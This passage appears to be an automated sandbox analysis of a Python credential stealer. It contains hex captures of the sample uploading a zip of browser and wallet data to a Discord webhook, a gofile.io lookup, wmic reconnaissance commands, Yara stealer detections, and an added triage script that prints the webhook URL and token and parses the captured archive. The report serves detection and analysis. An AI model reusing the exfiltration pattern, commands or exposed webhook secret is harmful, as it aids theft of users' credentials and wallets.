                                                                                                                                                                                                                                  2024-10-28 07:20:34 UTC140OUTData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 34 44 38 30 32 37 34 32 2d 33 30 39 39 2d 39 43 30 45 2d 43 31 39 42 2d 32 41 32 33 45 41 31 46 43 34 32 30 2e 7a 69 70 22 0d 0a 0d 0a
                                                                                                                                                                                                                                  Data Ascii: Content-Type: application/octet-streamContent-Disposition: form-data; name="file"; filename="4D802742-3099-9C0E-C19B-2A23EA1FC420.zip"
                                                                                                                                                                                                                                  2024-10-28 07:20:34 UTC16384OUTData Raw: 50 4b 03 04 14 00 00 00 00 00 8f 1a 5c 59 00 00 00 00 00 00 00 00 00 00 00 00 09 00 00 00 42 72 6f 77 73 65 72 73 2f 50 4b 03 04 14 00 00 00 00 00 8b 1a 5c 59 00 00 00 00 00 00 00 00 00 00 00 00 08 00 00 00 57 61 6c 6c 65 74 73 2f 50 4b 03 04 14 00 00 00 08 00 8d 1a 5c 59 84 34 c8 7f bf 57 0a 00 ce 9d 0a 00 0f 00 00 00 44 69 73 70 6c 61 79 20 28 31 29 2e 70 6e 67 6c bb 7b 3c 93 7f fc 3f 7c 6d 26 86 1c 26 91 9c 4d 2b 73 48 27 a7 61 52 31 ca 94 9c 19 a1 10 39 46 86 b1 a4 10 39 8b 4a a3 28 39 13 42 8e 89 39 e4 2c 87 24 87 61 e4 7c 98 39 73 4f 9f ef f7 be ef df e3 be ff f0 d8 76 ed bd 3d ae 5d 9e af e7 e1 fd 7a 5d e1 06 fa da 47 d9 04 d9 00 00 38 8a d1 b9 72 0b 00 98 19 4f 21 00 eb 11 c6 43 4d 3c 4d 8b f1 00 f2 ba a5 7d 19 c8 ef 10 fa 7b f8 96 83 e6 0d 4d 00
                                                                                                                                                                                                                                  Data Ascii: PK\YBrowsers/PK\YWallets/PK\Y4WDisplay (1).pngl{<?|m&&M+sH'aR19F9J(9B9,$a|9sOv=]z]G8rO!CM<M}{M
                                                                                                                                                                                                                                  2024-10-28 07:20:34 UTC16384OUTData Raw: 25 be df 4b 78 8a 27 13 2b 53 2d 5b 9e e0 dd ac 24 0d ca da 8d ef 62 12 5e b8 f1 59 4e 22 2b b3 dc 7c 8a 49 b9 3e ff 83 3c cf e9 dc 41 ad 59 cc fc e3 ed b6 c7 ed 1f 3e a8 b8 a7 81 97 0b 73 52 69 cc d6 88 73 20 d6 51 b3 6d 5f 25 ea ea 6f ab a2 81 a3 2c d6 c7 0e b0 49 3b ab 19 7f c4 14 52 83 50 e5 e0 ae db 07 4f 1d 3a 38 6a 09 2b 64 06 e7 d6 17 23 9f 10 0c 0b d1 80 44 1e 23 f6 2d 16 52 de b1 34 b5 61 d9 ea 46 f0 e7 59 eb 06 38 87 ce e7 2d 4d 4b 89 9d 3d 03 28 72 1c 22 ef 30 ed fd 67 19 fe 5f 58 c4 fc 87 c5 43 8b 60 0c f8 31 96 e4 36 14 bb 5c 07 b1 1e 0e af ff eb 2b 14 d9 16 58 e4 d6 15 4f 60 40 4a cf 11 ff 4c b2 93 d8 1a 7c a7 35 99 dc 86 d9 7d 51 28 ea a5 d0 bf 39 a3 96 08 11 da 1a 24 c8 5e 4f 00 4a 08 7a 0c 75 55 c6 54 a3 ee 4d 97 f4 47 65 06 ce 90 8e 7f
                                                                                                                                                                                                                                  Data Ascii: %Kx'+S-[$b^YN"+|I><AY>sRis Qm_%o,I;RPO:8j+d#D#-R4aFY8-MK=(r"0g_XC`16\+XO`@JL|5}Q(9$^OJzuUTMGe
                                                                                                                                                                                                                                  2024-10-28 07:20:34 UTC16384OUTData Raw: 82 f7 e6 58 49 9c 6b 4b d5 ea 4e 83 0c 82 87 b0 3d 16 78 c4 c2 45 18 2d c1 45 22 36 5a 1a b3 80 b7 82 a0 e4 63 aa 76 c6 10 77 a1 e4 a9 3a aa 24 70 df 06 d1 22 01 20 2c c1 b5 bd 10 5b 26 50 52 b3 4f 73 42 20 3f 63 dc 63 de b1 84 ee f7 f0 4d d6 ff fa f5 b8 38 81 2a d3 25 d3 fe 9b 56 65 18 36 46 c7 f1 b1 9a b7 ff 48 31 56 e6 2c 33 b0 17 3b 43 27 3d 35 b7 69 98 d7 c7 6e bc 11 37 a1 6a fa db 3a 05 7e 48 fd 34 ae 4f 4b d4 a3 8a 1d bc 6b f2 26 02 65 89 be 22 6c 68 e4 16 4a ba ca bc 10 53 b2 2d d0 0d 2a bb 1f 40 55 68 57 87 8c 06 65 36 74 47 a0 31 ea e1 6a 26 ac 72 2f 79 e1 2d 5c b6 d3 22 19 58 dd 28 c9 03 82 ec 7d fc 91 95 35 54 8f 0f 27 46 89 70 a4 61 d6 a0 26 b4 5e ec cd 87 b0 d4 0d b3 69 3e 5e f0 f5 8b ef a4 8b 4b ba 29 21 f6 b0 39 25 82 29 db 27 15 b0 b5 ae
                                                                                                                                                                                                                                  Data Ascii: XIkKN=xE-E"6Zcvw:$p" ,[&PROsB ?ccM8*%Ve6FH1V,3;C'=5in7j:~H4OKk&e"lhJS-*@UhWe6tG1j&r/y-\"X(}5T'Fpa&^i>^K)!9%)'
                                                                                                                                                                                                                                  2024-10-28 07:20:34 UTC16384OUTData Raw: 53 1d cb 11 d8 55 ee 74 c1 53 5b 45 62 33 c1 af 86 ed cd b4 70 aa 69 cd da 14 ef e6 a7 a0 1f 25 80 dc fc 6b 28 ae dc ae ef aa 62 f9 1f ba 42 9a cc 54 c7 f8 cc b0 25 e7 99 bf 7c c6 ad 3c f7 db f8 5e b6 3f e1 be df 6b 4b f3 8d 2d b1 7c 2d d2 41 64 2e 5a 8e b2 63 37 6b dc eb dd 63 4e 93 56 9c 79 22 79 14 2a 0c e8 0e b8 43 fa 74 93 b5 aa 2b 2a 1f 7c b8 8f ba d9 af fa f9 0b 70 4f cb 9a cf 2b 25 a9 63 48 0e 97 b3 21 ea ce ad 6a 2f 02 e8 ae 0e 98 6d b3 dc ed a7 08 2a df 66 bb 82 b1 32 36 2e 6c 0b 7a 1f c0 f7 90 ef ab 6b 2b de 7f 57 de 34 22 85 59 01 5c 4f 0f 12 98 15 6b f7 b3 3d 1d bc c3 62 18 0b cd fe 28 7b 0a f9 70 b1 bd d7 90 e7 07 87 5b 36 50 76 68 b5 f6 63 18 fb 91 19 63 53 df ac 89 c8 8e 50 bc 70 17 3e 66 7c 0b de 1e b2 30 f3 08 39 dd dd 58 f0 83 b7 41 e2
                                                                                                                                                                                                                                  Data Ascii: SUtS[Eb3pi%k(bBT%|<^?kK-|-Ad.Zc7kcNVy"y*Ct+*|pO+%cH!j/m*f26.lzk+W4"Y\Ok=b({p[6PvhccSPp>f|09XA
                                                                                                                                                                                                                                  2024-10-28 07:20:34 UTC16384OUTData Raw: 01 c5 b9 dc aa 05 7b 60 09 11 0f b3 23 5b 08 4d 7e 8f e7 2f e2 2c 00 19 c8 b1 0c ce 79 bc df bd fb a6 b8 d0 3d d4 f8 5b 6d 46 58 c4 12 17 72 f4 b3 0c db d4 67 19 8d be 7f 62 cc 7e e2 d5 ac 97 f8 2c 81 4c 42 51 d3 68 eb 5a dc ca fc 95 88 05 90 fa 02 a7 0d 39 fa 98 b9 71 b0 1c ae 9c 74 73 eb c4 f1 df fc e9 6f 97 b3 23 8d 3b 07 e4 40 af 57 44 37 26 c7 bb ff 1a 85 4d 96 fd c9 50 51 44 9a dd 79 d4 50 b6 e1 fa 9a f7 cf cb 13 a6 2c ed af 9a d2 bd 38 bc 04 c8 0a 75 3c 81 22 75 21 02 f2 b6 76 46 69 61 84 c8 1f 9b 16 e8 d7 31 28 51 9c 91 86 02 d8 ee b4 15 f5 55 bb d1 1a 9c c4 99 7e 7d 6c 69 2d 82 c1 1f 54 c0 9f fc bf 70 90 d7 b3 ff 3d 70 7e 93 ad c2 e5 45 18 51 22 2f bc 0c 37 ec 56 0e fc 5d d4 43 e5 4f 0f 47 d2 ed a5 08 03 47 6c 29 54 cc 6b 3d b3 73 f8 ea e6 b7 ec
                                                                                                                                                                                                                                  Data Ascii: {`#[M~/,y=[mFXrgb~,LBQhZ9qtso#;@WD7&MPQDyP,8u<"u!vFia1(QU~}li-Tp=p~EQ"/7V]COGGl)Tk=s
                                                                                                                                                                                                                                  2024-10-28 07:20:34 UTC16384OUTData Raw: 6d 3d 7c 40 48 da 68 ec ad 5f 56 38 9f 41 f5 e7 fc c4 bf 9a 4a 21 47 1a 27 14 d3 53 6a 2c 50 8b c2 7b 8f 54 89 9a a1 10 36 7c 8a 39 76 5f 5e 74 9c 98 09 5d 4c ec 92 6e 9d c2 e9 71 cf f5 7b 72 cf 5d ba 41 fb 60 76 87 70 ba c0 81 25 9a 14 7e f2 cb 12 98 3d 79 8d df d9 3e f1 76 82 86 68 59 a2 51 c4 83 fd 7a 83 04 db e7 ff 7c 17 ed 30 30 02 da a5 39 14 4f ee cc 6d fa 30 89 ac bd 9f da f4 78 b6 5f 5f f8 59 85 ca 63 09 10 2a bd ad 81 d9 d0 8d e2 99 41 15 fc 34 65 d3 43 6b a3 65 6f d0 27 08 e5 7b a0 3f 83 42 ee b1 f5 61 1f 1d fd 60 cf 75 f0 f5 d7 41 64 10 fb 51 d6 ad 08 b5 84 56 1e f7 19 d9 83 d7 5f 5f dc ba 92 f9 3c 3c c6 58 44 f7 15 13 52 a8 ec 9d d5 1f 4f 0f 0c 15 d5 36 56 af d8 8a 91 5e b6 89 b6 4f 89 bf 40 16 a6 dc 6a b3 a4 09 4b 5a 0a 79 4a ed 94 df f6 22
                                                                                                                                                                                                                                  Data Ascii: m=|@Hh_V8AJ!G'Sj,P{T6|9v_^t]Lnq{r]A`vp%~=y>vhYQz|009Om0x__Yc*A4eCkeo'{?Ba`uAdQV__<<XDRO6V^O@jKZyJ"
                                                                                                                                                                                                                                  2024-10-28 07:20:34 UTC16384OUTData Raw: 83 13 08 0b af f2 e9 80 ae a2 71 e9 79 9f b2 e3 a9 e0 e1 58 d8 51 8e 32 f0 16 70 58 56 03 4a c7 a5 b5 38 ab 28 02 87 fe 03 73 c4 8e f4 28 cb 56 97 c9 12 1a 07 8e f6 21 d4 56 47 d2 22 9f 44 4d 01 0f ff 32 29 3e e9 6b 21 bb 9a f9 a0 cf 64 e9 47 10 53 8d 3f c9 d0 79 ee df 4e b9 3e 38 8e e3 4c da f9 74 93 72 b1 38 f6 7a 4b f5 7b a7 55 e3 2a 38 24 15 78 55 d1 61 ff 4b 28 20 69 eb 43 10 57 81 b0 ed 8c 44 31 d4 b7 94 63 f5 4e 07 0e 16 76 bf 6c 6e 24 4d 75 f5 6f 5a c7 13 3d 5e a2 59 c9 4e 75 b0 2c af 39 8e ce 2a 31 42 a6 9d 80 91 0b 5b 12 f2 17 ce fa 18 fd 51 d6 b3 7d 13 46 7e bd 9c 52 7e 2d 9d a6 ca 95 11 d9 63 52 2c ab 49 19 6c a5 a4 19 21 c4 a3 65 c6 1b 9d 7e 75 56 c5 e4 10 94 23 10 7f 45 a4 cb 2c 72 f3 49 f8 f2 1a 5c 4d cb d9 f6 5a 36 c5 1b ec 15 fd 08 a2 bc
                                                                                                                                                                                                                                  Data Ascii: qyXQ2pXVJ8(s(V!VG"DM2)>k!dGS?yN>8Ltr8zK{U*8$xUaK( iCWD1cNvln$MuoZ=^YNu,9*1B[Q}F~R~-cR,Il!e~uV#E,rI\MZ6
                                                                                                                                                                                                                                  2024-10-28 07:20:34 UTC16384OUTData Raw: d7 3b ed 84 d6 12 96 9d 22 ef 17 43 02 5e 78 a0 16 1e a6 fe a7 f3 f6 db e9 ae b5 aa ff 0e f0 b7 ec a3 4e 5a 8d 22 9d 21 b9 f5 8b 60 d1 b1 b0 7f b3 0b 55 96 78 ea 7c c2 5d 15 89 26 75 58 44 c4 0f c5 98 c5 b8 8d 9e 0b b3 05 1c d7 bc 60 3b 5d c0 0a 25 f0 e8 03 97 ff 29 a1 49 7d 9d d3 bc 75 1b 52 23 54 14 74 3e ae 21 1c 36 98 4f 00 fa ef ee d4 bc cd 95 af db 4c 50 d8 c3 e2 3e 4d 12 8f 9a 5e 7b da 34 1c 04 2e 7f 18 f6 05 92 4b 73 47 01 cf 93 7e 46 da f9 39 f1 ae ee e6 29 49 d1 28 f2 64 38 29 16 77 1e 9e 57 6b b2 e4 8d b8 0b d2 d4 3f 33 29 8a dc 0f 43 f1 70 1c a4 38 7d 1b 39 b0 85 e2 71 5c 49 05 5a b5 25 63 af 63 0b 25 85 9b 3e 93 50 40 f1 2f 94 be 96 34 77 6c 9e 75 99 a5 c2 15 02 d6 f6 b5 94 98 b1 f4 ee 74 20 a3 9c 91 d7 b3 d1 e1 70 13 c5 3c 58 58 5f 29 5d 19
                                                                                                                                                                                                                                  Data Ascii: ;"C^xNZ"!`Ux|]&uXD`;]%)I}uR#Tt>!6OLP>M^{4.KsG~F9)I(d8)wWk?3)Cp8}9q\IZ%cc%>P@/4wlut p<XX_)]
2024-10-28 07:20:35 UTC | 940 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 07:20:35 GMT
                                                                                                                                                                                                                                  Content-Type: application/json
                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                  x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                  x-ratelimit-limit: 5
                                                                                                                                                                                                                                  x-ratelimit-remaining: 4
                                                                                                                                                                                                                                  x-ratelimit-reset: 1730100036
                                                                                                                                                                                                                                  x-ratelimit-reset-after: 1
                                                                                                                                                                                                                                  vary: Accept-Encoding
                                                                                                                                                                                                                                  via: 1.1 google
                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T3hCOnw7HOABa%2Bp1MTK8VhsBthkSATk1e%2FKSUZJ1LOsr8l5W%2F3oJUJ9nmN1ZgD5Q3A5nBNIVII8vX7Cwp6vwyug%2BLTa%2BH%2B5bPtU7mdbeGh6DWAcATVSKi0ayh%2FPk"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                  CF-RAY: 8d9929fd3fcc6b34-DFW
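
The session above is the exfiltration step: a multipart upload to a Discord webhook whose body is a zip archive whose first local file headers already name `Browsers/`, `Wallets/` and a screenshot. The following script is an added triage example, not code from Joe Sandbox or from the sample; it pulls the webhook identity out of the request line, flags the indicators visible in the capture (webhook target, `Python/3.10 aiohttp` user agent, zip attachment, body size), and lists the archive entries by walking the zip local file headers in the first bytes of the body, which is all a partial capture ever contains. The request head, multipart part header and hex bytes are constructed inline from the capture above; the 100 KB "large body" threshold and the indicator wording are assumptions of this example.

```python
"""Triage a captured Discord-webhook upload: identify the webhook, flag
stealer-style indicators, and list zip entries from a partial body."""
from __future__ import annotations

import re
from dataclasses import dataclass
from datetime import datetime
from struct import unpack_from

# Constructed sample: request head, multipart part header and the first
# 128 bytes of the "Data Raw" hex dump, copied from the capture above.
REQUEST_HEAD = (
    "POST /api/webhooks/1298294465534099557/"
    "tV90pThPVvQpjF3HTJU-fplHLi0RLPFiHy4H6WFkFos5MS3hw3K64VoD-wO_IKZJNJCs HTTP/1.1\r\n"
    "Host: discord.com\r\n"
    "User-Agent: Python/3.10 aiohttp/3.10.10\r\n"
    "Content-Length: 695494\r\n"
    "Content-Type: multipart/form-data; boundary=6bb8c0d858ae495f912113e926432cf5\r\n"
)
PART_HEAD = (
    "Content-Type: application/octet-stream\r\n"
    'Content-Disposition: form-data; name="file"; '
    'filename="4D802742-3099-9C0E-C19B-2A23EA1FC420.zip"\r\n\r\n'
)
BODY_HEX = (
    "50 4b 03 04 14 00 00 00 00 00 8f 1a 5c 59 00 00 00 00 00 00 00 00 00 00 00 00"
    " 09 00 00 00 42 72 6f 77 73 65 72 73 2f"
    " 50 4b 03 04 14 00 00 00 00 00 8b 1a 5c 59 00 00 00 00 00 00 00 00 00 00 00 00"
    " 08 00 00 00 57 61 6c 6c 65 74 73 2f"
    " 50 4b 03 04 14 00 00 00 08 00 8d 1a 5c 59 84 34 c8 7f bf 57 0a 00 ce 9d 0a 00"
    " 0f 00 00 00 44 69 73 70 6c 61 79 20 28 31 29 2e 70 6e 67 6c bb 7b 3c 93 7f"
)

WEBHOOK_RE = re.compile(r"^POST /api/webhooks/(\d+)/([A-Za-z0-9_-]+) HTTP/1\.[01]$")
LOCAL_HEADER_SIG = b"PK\x03\x04"
LOCAL_HEADER_LEN = 30        # fixed part of a zip local file header
LARGE_BODY_BYTES = 100_000   # assumed triage threshold, not taken from the report


@dataclass
class ZipEntry:
    name: str
    method: int              # 0 = stored, 8 = deflate
    crc32: int
    compressed_size: int
    uncompressed_size: int
    mtime: datetime          # DOS time in the header, i.e. the victim's local clock


def parse_headers(block: str) -> dict[str, str]:
    """Lower-cased name -> value for CRLF-separated header lines."""
    headers = {}
    for line in block.strip("\r\n").split("\r\n"):
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers


def webhook_identity(request_line: str) -> tuple[str, str] | None:
    """(webhook id, token) when the request line targets a Discord webhook."""
    m = WEBHOOK_RE.match(request_line.strip())
    return (m.group(1), m.group(2)) if m else None


def exfil_indicators(request_head: str, part_head: str) -> list[str]:
    """Reasons this upload looks like stealer exfiltration, in a fixed order."""
    request_line, _, rest = request_head.partition("\r\n")
    headers, part = parse_headers(rest), parse_headers(part_head)
    hits = []
    ident = webhook_identity(request_line)
    if ident and headers.get("host") == "discord.com":
        hits.append(f"discord webhook upload (id {ident[0]})")
    ua = headers.get("user-agent", "")
    if ua.startswith("Python/") and "aiohttp" in ua:
        hits.append(f"scripted client: {ua}")
    fname = re.search(r'filename="([^"]*)"', part.get("content-disposition", ""))
    if fname and fname.group(1).lower().endswith(".zip"):
        hits.append(f"zip attachment {fname.group(1)}")
    if int(headers.get("content-length", "0")) > LARGE_BODY_BYTES:
        hits.append(f"large body: {headers['content-length']} bytes")
    return hits


def dos_datetime(dos_time: int, dos_date: int) -> datetime:
    """Decode the MS-DOS date/time fields of a zip header (2-second resolution)."""
    return datetime((dos_date >> 9) + 1980, (dos_date >> 5) & 0xF, dos_date & 0x1F,
                    dos_time >> 11, (dos_time >> 5) & 0x3F, (dos_time & 0x1F) * 2)


def zip_local_entries(data: bytes) -> list[ZipEntry]:
    """Walk consecutive local file headers from the start of a zip stream.
    Stops at the first truncated header, so a partial capture such as the
    sandbox's first 16 KiB chunk still yields the leading entries."""
    entries, off = [], 0
    while data[off:off + 4] == LOCAL_HEADER_SIG and off + LOCAL_HEADER_LEN <= len(data):
        (_ver, flags, method, t, d, crc, csize, usize,
         nlen, elen) = unpack_from("<HHHHHIIIHH", data, off + 4)
        name_start = off + LOCAL_HEADER_LEN
        if name_start + nlen > len(data):
            break
        name = data[name_start:name_start + nlen].decode("utf-8", "replace")
        entries.append(ZipEntry(name, method, crc, csize, usize, dos_datetime(t, d)))
        if flags & 0x8 and csize == 0:
            break   # sizes live in a trailing data descriptor; cannot skip ahead
        off = name_start + nlen + elen + csize
    return entries


if __name__ == "__main__":
    for hit in exfil_indicators(REQUEST_HEAD, PART_HEAD):
        print("indicator:", hit)
    for e in zip_local_entries(bytes.fromhex(BODY_HEX)):
        print(f"{e.name:18} method={e.method} uncompressed={e.uncompressed_size} "
              f"mtime={e.mtime:%Y-%m-%d %H:%M:%S}")
```

Run against the bytes above, the walker reports two stored directory entries, `Browsers/` and `Wallets/`, followed by a deflated `Display (1).png` of 695,758 bytes uncompressed, and decodes the DOS timestamps to 03:20 on 2024-10-28, consistent with the 07:20 UTC capture time on a machine whose local clock runs four hours behind UTC. The walker deliberately reads only local file headers rather than the central directory, because the central directory sits at the end of the archive and is never present in the first chunk of a capture; the data-descriptor check is the one case where that approach cannot advance to the next entry.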


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
3          | 192.168.2.6 | 49774       | 45.112.123.126 | 443              | 7112 | C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-28 07:20:36 UTC | 134 | OUT | GET /getServer HTTP/1.1
                                                                                                                                                                                                                                  Host: api.gofile.io
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                  User-Agent: Python/3.10 aiohttp/3.10.10
2024-10-28 07:20:36 UTC | 1113 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                  Server: nginx/1.27.1
                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 07:20:36 GMT
                                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                  Content-Length: 14
Connection: close
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: Content-Type, Authorization
Access-Control-Allow-Methods: GET, POST, OPTIONS, PUT, DELETE, HEAD
Access-Control-Allow-Credentials: true
Content-Security-Policy: default-src 'self';base-uri 'self';font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: cross-origin
Origin-Agent-Cluster: ?1
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=15552000; includeSubDomains
X-Content-Type-Options: nosniff
X-DNS-Prefetch-Control: off
X-Download-Options: noopen
X-Frame-Options: SAMEORIGIN
X-Permitted-Cross-Domain-Policies: none
X-XSS-Protection: 0
ETag: W/"e-18wLxDNka2j9cTg7gpgujtuBb1A"
Timestamp: 2024-10-28 07:20:36 UTC | Bytes: 14 | Direction: IN | Data Raw: 65 72 72 6f 72 2d 6e 6f 74 46 6f 75 6e 64
Data Ascii: error-notFound


Target ID: 0
Start time: 03:20:07
Start date: 28/10/2024
Path: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe"
Imagebase: 0x7ff7b2b60000
File size: 9'934'907 bytes
MD5 hash: AECB2C382B2181620AA3243DCBCA51C8
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 2
Start time: 03:20:08
Start date: 28/10/2024
Path: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe"
Imagebase: 0x7ff7b2b60000
File size: 9'934'907 bytes
MD5 hash: AECB2C382B2181620AA3243DCBCA51C8
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_ExelaStealer, Description: Yara detected Exela Stealer, Source: 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2446198201.0000018B48D90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_ExelaStealer, Description: Yara detected Exela Stealer, Source: 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.2433574668.0000018B489E4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.2430757947.0000018B489E4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_ExelaStealer, Description: Yara detected Exela Stealer, Source: 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_ExelaStealer, Description: Yara detected Exela Stealer, Source: 00000002.00000002.2447358540.0000018B49FB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: 00000002.00000002.2447358540.0000018B49FB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2447358540.0000018B49FB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_ExelaStealer, Description: Yara detected Exela Stealer, Source: 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Target ID: 3
Start time: 03:20:10
Start date: 28/10/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c "ver"
Imagebase: 0x7ff73cdb0000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 4
Start time: 03:20:10
Start date: 28/10/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff66e660000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 5
Start time: 03:20:10
Start date: 28/10/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Imagebase: 0x7ff73cdb0000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 6
Start time: 03:20:10
Start date: 28/10/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer"
Imagebase: 0x7ff73cdb0000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

                                                                                                                                                                                                                                  Target ID:7
                                                                                                                                                                                                                                  Start time:03:20:10
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:8
                                                                                                                                                                                                                                  Start time:03:20:10
                                                                                                                                                                                                                                  Start date:28/10/2024
